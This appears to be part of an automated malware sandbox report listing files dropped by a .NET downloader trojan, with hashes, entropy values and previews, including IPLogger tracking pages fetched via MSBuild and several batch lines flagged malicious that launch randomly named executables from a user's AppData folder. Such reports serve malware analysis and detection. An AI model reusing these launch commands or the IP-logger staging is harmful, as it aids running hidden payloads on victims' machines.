                    Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                    Process:C:\Windows\System32\svchost.exe
                    File Type:Extensible storage user DataBase, version 0x620, checksum 0xc4349413, page size 16384, Windows version 10.0
                    Category:dropped
                    Size (bytes):1310720
                    Entropy (8bit):0.6291483968958587
                    Encrypted:false
                    SSDEEP:1536:PSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Paza9iJa+2UtmOQOL
                    MD5:9FCDBE031936E932B863299A9DB0900F
                    SHA1:256538B1655D96E1F1B5CB9DA9E914F38D7220EC
                    SHA-256:4E456851D10F45883F185E0535570992E4A525DDAA381C47750F33920CDF5146
                    SHA-512:EF04BA8A9E6B41BC622A3C92EB40FC1B9226442AC1B3116125619440764A37765281D3273000965C8DA23D0EDFF587B1B9A2B7B6E07C29747EE9DB9AB2BE3F4E
                    Malicious:false
                    Preview:.4..... .......P.......X\...;...{......................0.j..........|.......|..h.g..........|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................E.....|...................a<......|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.07949203783097569
                    Encrypted:false
                    SSDEEP:3:/JllWetYebwmKeG9lweD4A27xs/9MG9lYllHol///lZMPCyH:hzbJKe/G1wpo5
                    MD5:CB0E678C968F40ADFA26718B18D6C496
                    SHA1:B4B0C4D74EE99416CA4B438EE6EB00CAE2DB4280
                    SHA-256:499ED7937E5016F739147AE06189898A1B84C7A9218EF44BC4ECBBD67BD4A54A
                    SHA-512:0146C956101E27C9B1DF9B1DF2EA589D496950CB99084332C2689C87BAC7437759CB2DE11ED088DA911EDC6BBF4E9E5C44F338C6ABAA505E1470C6EE481A6F18
                    Malicious:false
                    Preview:..eP.....................................;...{.......|.......|...............|.......|...a{#.....|g..................a<......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:NlllulnmWllZ:NllUmWl
                    MD5:3EBBEC2F920D055DAC842B4FF84448FA
                    SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                    SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                    SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                    Malicious:false
                    Preview:@...e................................................@..........
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):72
                    Entropy (8bit):4.9352881543647955
                    Encrypted:false
                    SSDEEP:3:Ljn9m1N+E2J5GJUNyZ9y2XHH:fE1N723GxPH
                    MD5:AD70449709C5E5934858170CAB41F089
                    SHA1:F5DC4664A8EB26AE85302B4A549AF16E5FCEFB72
                    SHA-256:FB1C5FBCFEF2C4075843C7D27CE3AD9EAC709C6C63A89A395A6D6A895295597F
                    SHA-512:E1E05D2F3D9D1A76570F40CC591F05B601DD476163CEB56DE91556B7BCBBBBA3F44EC0C4FDE6179C073345F41C3C85D3B55F309B2C85E042D940F3D673CC1B3D
                    Malicious:true
                    Preview:start "" "C:\Users\user\AppData\Local\cl3vhpdkLtmoLXWJKBugbJDP.exe"
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):72
                    Entropy (8bit):4.799852738746559
                    Encrypted:false
                    SSDEEP:3:Ljn9m1N+E2J5AxrJlhvTPls:fE1N723AtJLTG
                    MD5:2139EC5998BE95B974D08BAF7F4D0ACC
                    SHA1:7741D7160DC48487B14BB366B0F1311276C1F1A0
                    SHA-256:FFD74F4C2B22153C19CC402121B4987685528AB6B78F58E188E91848D6526490
                    SHA-512:B3E2F609D4815BCF8266DA35202EDC7C5B7FD519B99611D606F08A363903FCE945808909A517820ADE5C4F8BC8534F5B9C0CC69A598A715FDCD3583BC4EF08E1
                    Malicious:true
                    Preview:start "" "C:\Users\user\AppData\Local\eTNltv0LYVQnDdBl6tKVEYLr.exe"
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):72
                    Entropy (8bit):5.029106036339288
                    Encrypted:false
                    SSDEEP:3:Ljn9m1N+E2J5WlcuafXXNLvn:fE1N723WBafXXNLv
                    MD5:E9EF602ADF63FC73FDDB36F792B3AD37
                    SHA1:0D11A1FB93DACEE9B45F218CBA7655B690547651
                    SHA-256:60E0EA068D25EB2798B39ABB9635B1376D1095FDBE2984D9AC2A73C8B5F1CF82
                    SHA-512:EE7C7310264BB8222BDB3BF1302E96FC506EFEE0EF1A581D41A534786CD396261FF2C4BB35B9C0DFFEEDEFA235B02ED328E8A1B423C02A1519C4B786F38B340B
                    Malicious:true
                    Preview:start "" "C:\Users\user\AppData\Local\sOj9v5fBDMPcMK0zpX2B6CYH.exe"
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):72
                    Entropy (8bit):4.824177043253686
                    Encrypted:false
                    SSDEEP:3:Ljn9m1N+E2J5KUpHxwdAzsn:fE1N723KUtxwdSs
                    MD5:60E6880E740F3F976F62D794BE965633
                    SHA1:B8CFFA5D690FA72A06082D639208D10F6199731A
                    SHA-256:46687767783549BCEA4CEB412A55387E9EF2F202AA24C66F5BA76511DE2A0DB7
                    SHA-512:B677429756DA877ED139BAC9DF1966C676D2D8B86E838B70E18248B7392860019BAA8AD7D5188DCED6AA2CD86B05040294544D8C67BA1D32EFE33D443AD0919D
                    Malicious:true
                    Preview:start "" "C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exe"
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):72
                    Entropy (8bit):4.938964022510495
                    Encrypted:false
                    SSDEEP:3:Ljn9m1N+E2J5jNtTxrDOUwln:fE1N723NJwl
                    MD5:17F19672DDF882B8AEE85FD6D715F2C1
                    SHA1:79FA9C01138484DC607F843B78CB667420F9722E
                    SHA-256:3F66881C0CC3C93A97F193157746581E0003B59F115390959F97BC843BA8BB92
                    SHA-512:F23377B3CBDA039C7B21C9D11710D93FC2EDCAE09A90387452DAF33BA97D94DA3BF662CE02EA12AB373BC16A050C94DCC89F3DF83E2B2A64DD5ED279F35FD4C2
                    Malicious:true
                    Preview:start "" "C:\Users\user\AppData\Local\FMT2OeifGUTNfkZyqLG0jeEO.exe"
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                    Category:dropped
                    Size (bytes):7462
                    Entropy (8bit):5.420482116403958
                    Encrypted:false
                    SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                    MD5:77F762F953163D7639DFF697104E1470
                    SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                    SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                    SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                    Malicious:false
                    Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                    Process:C:\Windows\System32\svchost.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):55
                    Entropy (8bit):4.306461250274409
                    Encrypted:false
                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                    Malicious:false
                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):1835008
                    Entropy (8bit):4.4659261291476335
                    Encrypted:false
                    SSDEEP:6144:jzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:fZHtBZWOKnMM6bFpZj4
                    MD5:CC042D9FBD203B8AB06E57796C2EB5B6
                    SHA1:BAB2B5729A3A31F0E5F5148A5DACCF151E782E66
                    SHA-256:49BE6627FF8E3384D88855B21C8BA8983445D2B56E72012F3EB927DE96BE5A80
                    SHA-512:FED5D4DD8932B052FCDBDBE41B39E39C8A428C5484C281860BE30456A4862D7D7181476DBA7B5AB0DE1FC0B00480E8D343D4B2DD8027D8F69882483E0DDCBC45
                    Malicious:false
                    Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmnF.rm..................................................................................................................................................................................................................................................................................................................................................F........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                    Entropy (8bit):6.922629358941945
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 45.39%
                    • Win64 Executable GUI (202006/5) 42.25%
                    • InstallShield setup (43055/19) 9.01%
                    • Win64 Executable (generic) (12005/4) 2.51%
                    • Generic Win/DOS Executable (2004/3) 0.42%
                    File name:SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
                    File size:2'274'400 bytes
                    MD5:ec3afdbd761916a682e9372834365939
                    SHA1:35e3b8bc572d9ceadb2d519c4013fcf3632da802
